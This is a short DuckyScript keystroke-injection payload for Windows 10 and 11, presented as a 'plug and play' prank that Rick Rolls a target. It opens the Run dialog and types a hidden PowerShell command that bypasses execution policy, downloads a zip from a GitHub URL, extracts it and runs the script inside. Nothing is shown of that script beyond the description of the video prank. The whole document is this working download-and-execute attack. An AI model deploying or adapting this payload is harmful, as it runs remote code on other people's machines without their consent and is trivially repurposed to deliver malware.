REM     Title: ADV-RickRoll

REM    Author: I am Jakoby; with minor mods

REM    Description: This is a one liner payload that will Rick Roll your target. Video will be played at full screen and max volume. 
REM    Upon deployment, payload will pause until a mouse movement is detected and run once one is. 

REM    Target: Windows 10, 11

REM    --------------------------------------------------------------------------------------
REM     THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
REM     --------------------------------------------------------------------------------------

DELAY 500
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Ep Bypass $D="$env:tmp";irm -Uri 'https://github.com/flippyflipflap/snuts/blob/main/ADV-RR/rr.zip' -O "$D\rr.zip";Expand-Archive "$D\rr.zip" -Des $D\rr -Force;. "$D\rr\rr.ps1"
ENTER
